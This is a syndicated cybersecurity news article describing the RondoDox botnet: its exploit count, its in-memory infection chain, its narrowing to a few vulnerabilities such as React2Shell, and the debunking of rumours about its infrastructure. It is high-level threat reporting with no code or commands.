By rssfeeds-admin 
This expansion, combined with over 900 million exposed internet services, has created a massive attack surface.
In this vulnerable landscape, a powerful threat known as the RondoDox botnet has emerged, attracting attention for its massive arsenal of exploits and complex infrastructure.
First observed in May 2025, RondoDox generated significant traffic across global honeypots. While the malware shares code similarities with the Mirai botnet, RondoDox is distinct.
Unlike Mirai, which scans and exploits other systems directly from infected hosts, RondoDox’s sole purpose is to execute distributed denial-of-service (DoS) attacks.
The threat actors have demonstrated an aggressive approach, utilizing 174 different exploits and peaking at 15,000 daily exploitation attempts.
Infrastructure and Infection Chain
The infection process begins when the RondoDox infrastructure scans the internet for devices vulnerable to remote code execution (RCE).
Upon finding a target, attackers deploy a payload that fetches and executes a shell script entirely in memory, avoiding writing the initial implant to disk.
This script removes competing malware, locates a writable directory, and downloads the appropriate binary. Currently, RondoDox supports 18 hardware architectures, including ARM, MIPS, and x86 variants.
Exploit Arsenal and Threat Evolution
RondoDox operators initially employed a “shotgun approach,” blindly firing multiple exploits at a single target. Researchers observed the botnet utilizing 174 distinct vulnerabilities between May 2025 and February 2026.
However, nearly half of these exploits were discarded after a single day of use, indicating that threat actors continually test the success rate of their attacks before moving on.
By early 2026, the botnet’s methodology shifted. Instead of relying on dozens of older vulnerabilities, attackers streamlined operations to focus on just two highly effective exploits.
One was the React2Shell vulnerability (CVE-2025-55182), which operators added just three days after public disclosure.
In other instances, RondoDox exploited flaws before official CVE numbers were even published, proving they actively monitor security research and proof-of-concept releases.
Despite their speed, the threat actors occasionally struggled with implementation.
Early attacks featured incorrectly formatted JSON payloads, and some modern exploits failed because operators hardcoded incorrect User-Agent strings that triggered target defense mechanisms.
Recent industry rumors suggesting RondoDox uses a “Loader-as-a-Service” backend or a decentralized peer-to-peer (P2P) network have been officially debunked.
The supposed backend panel was merely an bitsight open text file logging basic POST requests, and the alleged P2P nodes were simply the compromised residential IPs hosting malware payloads.
As RondoDox refines its tactics and rapidly adopts new vulnerabilities, organizations must prioritize strict exposure management and rapid patching of internet-facing systems to prevent devastating botnet infections.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.
The post RondoDox Botnet Grows To 174 Exploits With Large-Scale Residential IP Abuse appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.